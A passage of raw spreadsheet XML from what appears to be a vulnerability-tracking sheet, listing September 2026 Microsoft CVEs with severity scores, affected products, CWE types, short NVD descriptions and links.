t="inlineStr"><is><t>CVE-2026-62697</t></is></c><c r="D466" s="5" t="n"><v>7.8</v></c><c r="E466" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F466" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G466" s="5" t="inlineStr" /><c r="H466" s="5" t="n"><v>0.003</v></c><c r="I466" s="5" t="inlineStr" /><c r="J466" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K466" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L466" s="5" t="inlineStr" /><c r="M466" s="5" t="inlineStr" /><c r="N466" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O466" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P466" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q466" s="5" t="inlineStr" /><c r="R466" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S466" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T466" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t></is></c></row><row r="467"><c r="A467" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B467" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C467" s="5" t="inlineStr"><is><t>CVE-2026-62804</t></is></c><c r="D467" s="5" t="n"><v>7.8</v></c><c r="E467" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F467" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G467" s="5" t="inlineStr" /><c r="H467" s="5" t="n"><v>0.003</v></c><c r="I467" s="5" t="inlineStr" /><c r="J467" s="5" t="inlineStr" /><c r="K467" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L467" s="5" t="inlineStr" /><c r="M467" s="5" t="inlineStr" /><c r="N467" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q467" s="5" t="inlineStr" /><c r="R467" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S467" s="5" t="inlineStr"><is><t>External control of file name or path in Microsoft Office Word allows an unauthorized attacker to execute code locally.</t></is></c><c r="T467" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62804</t></is></c></row><row r="468"><c r="A468" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B468" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C468" s="5" t="inlineStr"><is><t>CVE-2026-62810</t></is></c><c r="D468" s="5" t="n"><v>7.8</v></c><c r="E468" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F468" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G468" s="5" t="inlineStr" /><c r="H468" s="5" t="n"><v>0.002</v></c><c r="I468" s="5" t="inlineStr" /><c r="J468" s="5" t="inlineStr" /><c r="K468" s="5" t="inlineStr" /><c r="L468" s="5" t="inlineStr" /><c r="M468" s="5" t="inlineStr" /><c r="N468" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P468" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q468" s="5" t="inlineStr" /><c r="R468" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S468" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T468" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62810</t></is></c></row><row r="469"><c r="A469" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B469" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C469" s="5" t="inlineStr"><is><t>CVE-2026-68787</t></is></c><c r="D469" s="5" t="n"><v>7.8</v></c><c r="E469" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F469" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G469" s="5" t="inlineStr" /><c r="H469" s="5" t="n"><v>0.002</v></c><c r="I469" s="5" t="inlineStr" /><c r="J469" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K469" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L469" s="5" t="inlineStr" /><c r="M469" s="5" t="inlineStr" /><c r="N469" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O469" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P469" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q469" s="5" t="inlineStr" /><c r="R469" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S469" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t></is></c><c r="T469" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t></is></c></row><row r="470"><c r="A470" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B470" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C470" s="5" t="inlineStr"><is><t>CVE-2026-68832</t></is></c><c r="D470" s="5" t="n"><v>7.8</v></c><c r="E470" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F470" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G470" s="5" t="inlineStr" /><c r="H470" s="5" t="n"><v>0.002</v></c><c r="I470" s="5" t="inlineStr" /><c r="J470" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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0" s="5" t="inlineStr" /><c r="M470" s="5" t="inlineStr" /><c r="N470" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O470" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P470" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q470" s="5" t="inlineStr" /><c r="R470" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S470" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T470" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t></is></c></row><row r="471"><c r="A471" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B471" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C471" s="5" t="inlineStr"><is><t>CVE-2026-68841</t></is></c><c r="D471" s="5" t="n"><v>7.8</v></c><c r="E471" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F471" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G471" s="5" t="inlineStr" /><c r="H471" s="5" t="n"><v>0.002</v></c><c r="I471" s="5" t="inlineStr" /><c r="J471" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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1" s="5" t="inlineStr" /><c r="M471" s="5" t="inlineStr" /><c r="N471" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O471" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P471" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q471" s="5" t="inlineStr" /><c r="R471" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S471" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T471" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t></is></c></row><row r="472"><c r="A472" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B472" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C472" s="5" t="inlineStr"><is><t>CVE-2026-68844</t></is></c><c r="D472" s="5" t="n"><v>7.8</v></c><c r="E472" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F472" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G472" s="5" t="inlineStr" /><c r="H472" s="5" t="n"><v>0.003</v></c><c r="I472" s="5" t="inlineStr" /><c r="J472" s="5" t="inlineStr" /><c r="K472" s="5" t="inlineStr" /><c r="L472" s="5" t="inlineStr" /><c r="M472" s="5" t="inlineStr" /><c r="N472" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O472" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P472" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q472" s="5" t="inlineStr" /><c r="R472" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S472" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t></is></c><c r="T472" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68844</t></is></c></row><row r="473"><c r="A473" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B473" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C473" s="5" t="inlineStr"><is><t>CVE-2026-68845</t></is></c><c r="D473" s="5" t="n"><v>7.8</v></c><c r="E473" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F473" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G473" s="5" t="inlineStr" /><c r="H473" s="5" t="n"><v>0.003</v></c><c r="I473" s="5" t="inlineStr" /><c r="J473" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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3" s="5" t="inlineStr" /><c r="M473" s="5" t="inlineStr" /><c r="N473" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O473" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P473" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q473" s="5" t="inlineStr" /><c r="R473" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S473" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T473" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t></is></c></row><row r="474"><c r="A474" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B474" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C474" s="5" t="inlineStr"><is><t>CVE-2026-68848</t></is></c><c r="D474" s="5" t="n"><v>7.8</v></c><c r="E474" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F474" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G474" s="5" t="inlineStr" /><c r="H474" s="5" t="n"><v>0.002</v></c><c r="I474" s="5" t="inlineStr" /><c r="J474" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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4" s="5" t="inlineStr" /><c r="M474" s="5" t="inlineStr" /><c r="N474" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P474" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q474" s="5" t="inlineStr" /><c r="R474" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S474" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T474" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t></is></c></row><row r="475"><c r="A475" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B475" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C475" s="5" t="inlineStr"><is><t>CVE-2026-68850</t></is></c><c r="D475" s="5" t="n"><v>7.8</v></c><c r="E475" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F475" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G475" s="5" t="inlineStr" /><c r="H475" s="5" t="n"><v>0.002</v></c><c r="I475" s="5" t="inlineStr" /><c r="J475" s="5" t="inlineStr" /><c r="K475" s="5" t="inlineStr" /><c r="L475" s="5" t="inlineStr" /><c r="M475" s="5" t="inlineStr" /><c r="N475" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P475" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q475" s="5" t="inlineStr" /><c r="R475" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S475" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Account allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T475" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68850</t></is></c></row><row r="476"><c r="A476" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B476" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C476" s="5" t="inlineStr"><is><t>CVE-2026-68875</t></is></c><c r="D476" s="5" t="n"><v>7.8</v></c><c r="E476" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F476" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G476" s="5" t="inlineStr" /><c r="H476" s="5" t="n"><v>0.002</v></c><c r="I476" s="5" t="inlineStr" /><c r="J476" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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6" s="5" t="inlineStr" /><c r="M476" s="5" t="inlineStr" /><c r="N476" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O476" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P476" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q476" s="5" t="inlineStr" /><c r="R476" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S476" s="5" t="inlineStr"><is><t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t></is></c><c r="T476" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t></is></c></row><row r="477"><c r="A477" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B477" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C477" s="5" t="inlineStr"><is><t>CVE-2026-68877</t></is></c><c r="D477" s="5" t="n"><v>7.8</v></c><c r="E477" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F477" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G477" s="5" t="inlineStr" /><c r="H477" s="5" t="n"><v>0.002</v></c><c r="I477" s="5" t="inlineStr" /><c r="J477" s="5" t="inlineStr" /><c r="K477" s="5" t="inlineStr" /><c r="L477" s="5" t="inlineStr" /><c r="M477" s="5" t="inlineStr" /><c r="N477" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O477" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P477" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q477" s="5" t="inlineStr" /><c r="R477" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S477" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t></is></c><c r="T477" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68877</t></is></c></row><row r="478"><c r="A478" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B478" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C478" s="5" t="inlineStr"><is><t>CVE-2026-68885</t></is></c><c r="D478" s="5" t="n"><v>7.8</v></c><c r="E478" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F478" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G478" s="5" t="inlineStr" /><c r="H478" s="5" t="n"><v>0.003</v></c><c r="I478" s="5" t="inlineStr" /><c r="J478" s="5" t="inlineStr" /><c r="K478" s="5" t="inlineStr" /><c r="L478" s="5" t="inlineStr" /><c r="M478" s="5" t="inlineStr" /><c r="N478" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q478" s="5" t="inlineStr" /><c r="R478" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S478" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T478" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68885</t></is></c></row><row r="479"><c r="A479" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B479" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C479" s="5" t="inlineStr"><is><t>CVE-2026-68888</t></is></c><c r="D479" s="5" t="n"><v>7.8</v></c><c r="E479" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F479" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G479" s="5" t="inlineStr" /><c r="H479" s="5" t="n"><v>0.003</v></c><c r="I479" s="5" t="inlineStr" /><c r="J479" s="5" t="inlineStr" /><c r="K479" s="5" t="inlineStr" /><c r="L479" s="5" t="inlineStr" /><c r="M479" s="5" t="inlineStr" /><c r="N479" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O479" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P479" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q479" s="5" t="inlineStr" /><c r="R479" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S479" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T479" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68888</t></is></c></row><row r="480"><c r="A480" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B480" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C480" s="5" t="inlineStr"><is><t>CVE-2026-68890</t></is></c><c r="D480" s="5" t="n"><v>7.8</v></c><c r="E480" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F480" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G480" s="5" t="inlineStr" /><c r="H480" s="5" t="n"><v>0.002</v></c><c r="I480" s="5" t="inlineStr" /><c r="J480" s="5" t="inlineStr" /><c r="K480" s="5" t="inlineStr" /><c r="L480" s="5" t="inlineStr" /><c r="M480" s="5" t="inlineStr" /><c r="N480" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q480" s="5" t="inlineStr" /><c r="R480" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S480" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T480" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68890</t></is></c></row><row r="481"><c r="A481" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B481" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C481" s="5" t="inlineStr"><is><t>CVE-2026-68892</t></is></c><c r="D481" s="5" t="n"><v>7.8</v></c><c r="E481" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F481" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G481" s="5" t="inlineStr" /><c r="H481" s="5" t="n"><v>0.002</v></c><c r="I481" s="5" t="inlineStr" /><c r="J481" s="5" t="inlineStr" /><c r="K481" s="5" t="inlineStr" /><c r="L481" s="5" t="inlineStr" /><c r="M481" s="5" t="inlineStr" /><c r="N481" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O481" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P481" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q481" s="5" t="inlineStr" /><c r="R481" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S481" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T481" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68892</t></is></c></row><row r="482"><c r="A482" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B482" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C482" s="5" t="inlineStr"><is><t>CVE-2026-68896</t></is></c><c r="D482" s="5" t="n"><v>7.8</v></c><c r="E482" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F482" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G482" s="5" t="inlineStr" /><c r="H482" s="5" t="n"><v>0.004</v></c><c r="I482" s="5" t="inlineStr" /><c r="J482" s="5" t="inlineStr" /><c r="K482" s="5" t="inlineStr" /><c r="L482" s="5" t="inlineStr" /><c r="M482" s="5" t="inlineStr" /><c r="N482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O482" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P482" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q482" s="5" t="inlineStr" /><c r="R482" s="5" t="inlineStr"><is><t>CWE-36</t></is></c><c r="S482" s="5" t="inlineStr"><is><t>Absolute path traversal in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T482" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68896</t></is></c></row><row r="483"><c r="A483" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B483" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C483" s="5" t="inlineStr"><is><t>CVE-2026-69265</t></is></c><c r="D483" s="5" t="n"><v>7.8</v></c><c r="E483" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F483" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G483" s="5" t="inlineStr" /><c r="H483" s="5" t="n"><v>0.002</v></c><c r="I483" s="5" t="inlineStr" /><c r="J483" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K48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83" s="5" t="inlineStr" /><c r="M483" s="5" t="inlineStr" /><c r="N483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O483" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P483" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q483" s="5" t="inlineStr" /><c r="R483" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S483" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T483" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t></is></c></row><row r="484"><c r="A484" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B484" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C484" s="5" t="inlineStr"><is><t>CVE-2026-69269</t></is></c><c r="D484" s="5" t="n"><v>7.8</v></c><c r="E484" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F484" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G484" s="5" t="inlineStr" /><c r="H484" s="5" t="n"><v>0.003</v></c><c r="I484" s="5" t="inlineStr" /><c r="J484" s="5" t="inlineStr" /><c r="K484" s="5" t="inlineStr" /><c r="L484" s="5" t="inlineStr" /><c r="M484" s="5" t="inlineStr" /><c r="N484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O484" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P484" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q484" s="5" t="inlineStr" /><c r="R484" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S484" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T484" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69269</t></is></c></row><row r="485"><c r="A485" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B485" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C485" s="5" t="inlineStr"><is><t>CVE-2026-69270</t></is></c><c r="D485" s="5" t="n"><v>7.8</v></c><c r="E485" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F485" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G485" s="5" t="inlineStr" /><c r="H485" s="5" t="n"><v>0.002</v></c><c r="I485" s="5" t="inlineStr" /><c r="J485" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K48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85" s="5" t="inlineStr" /><c r="M485" s="5" t="inlineStr" /><c r="N485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O485" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P485" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q485" s="5" t="inlineStr" /><c r="R485" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S485" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T485" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t></is></c></row><row r="486"><c r="A486" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B486" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C486" s="5" t="inlineStr"><is><t>CVE-2026-69277</t></is></c><c r="D486" s="5" t="n"><v>7.8</v></c><c r="E486" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F486" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G486" s="5" t="inlineStr" /><c r="H486" s="5" t="n"><v>0.003</v></c><c r="I486" s="5" t="inlineStr" /><c r="J486" s="5" t="inlineStr" /><c r="K486" s="5" t="inlineStr" /><c r="L486" s="5" t="inlineStr" /><c r="M486" s="5" t="inlineStr" /><c r="N486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O486" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P486" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q486" s="5" t="inlineStr" /><c r="R486" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S486" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T486" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69277</t></is></c></row><row r="487"><c r="A487" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B487" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C487" s="5" t="inlineStr"><is><t>CVE-2026-69283</t></is></c><c r="D487" s="5" t="n"><v>7.8</v></c><c r="E487" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F487" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G487" s="5" t="inlineStr" /><c r="H487" s="5" t="n"><v>0.002</v></c><c r="I487" s="5" t="inlineStr" /><c r="J487" s="5" t="inlineStr" /><c r="K487" s="5" t="inlineStr" /><c r="L487" s="5" t="inlineStr" /><c r="M487" s="5" t="inlineStr" /><c r="N487" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O487" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P487" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q487" s="5" t="inlineStr" /><c r="R487" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S487" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T487" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69283</t></is></c></row><row r="488"><c r="A488" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B488" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C488" s="5" t="inlineStr"><is><t>CVE-2026-69284</t></is></c><c r="D488" s="5" t="n"><v>7.8</v></c><c r="E488" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F488" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G488" s="5" t="inlineStr" /><c r="H488" s="5" t="n"><v>0.002</v></c><c r="I488" s="5" t="inlineStr" /><c r="J488" s="5" t="inlineStr" /><c r="K488" s="5" t="inlineStr" /><c r="L488" s="5" t="inlineStr" /><c r="M488" s="5" t="inlineStr" /><c r="N488" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O488" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P488" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q488" s="5" t="inlineStr" /><c r="R488" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S488" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows 